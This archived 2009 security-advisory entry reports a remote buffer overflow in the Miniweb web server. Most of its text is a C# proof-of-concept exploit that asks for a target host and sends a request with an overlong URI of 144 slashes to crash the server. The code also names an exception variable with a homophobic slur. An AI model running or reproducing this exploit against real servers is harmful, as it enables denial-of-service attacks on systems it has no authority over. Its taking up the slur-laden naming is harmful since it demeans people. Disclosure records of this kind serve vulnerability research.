Miniweb Buffer Overflow

2009-04-16T00:00:00
ID SECURITYVULNS:DOC:21671
Type securityvulns
Reporter Securityvulns
Modified 2009-04-16T00:00:00

Description

############# Miniweb Remote Buffer Overflow
##By: e.wiZz!
##Site: www.balcansecurity.com
## Found with ServMeNot (world's sexiest fuzzer :P )

In the wild...

/ BoF when requesting URI longer than 120~ /

using System; using System.IO; using System.Net; using System.Text;

namespace idiot { class pf { static void Main(string[] args) { Console.Write("Enter host:\n"); string site = Console.ReadLine(); string uri = null; try { for (int i = 0; i < 144; i++) { uri += "/"; } HttpWebRequest request = (HttpWebRequest) HttpWebRequest.Create(site + uri); HttpWebResponse response = (HttpWebResponse)

                request.GetResponse&#40;&#41;;

            //any response we get means that exploit failed
            if &#40;response.GetResponseHeader&#40;&quot;Content-Lenght&quot;&#41; != &quot;a&quot;&#41;
            {
                Console.WriteLine&#40;&quot;Exploit failed&quot;&#41;;
            }

        }
        catch &#40;Exception gayexception&#41;
        {
            Console.WriteLine&#40;&quot;Cannot connect&quot;&#41;;
            Console.WriteLine&#40;&quot;{0}&quot;, gayexception.Message&#41;;
        }
    }
}

}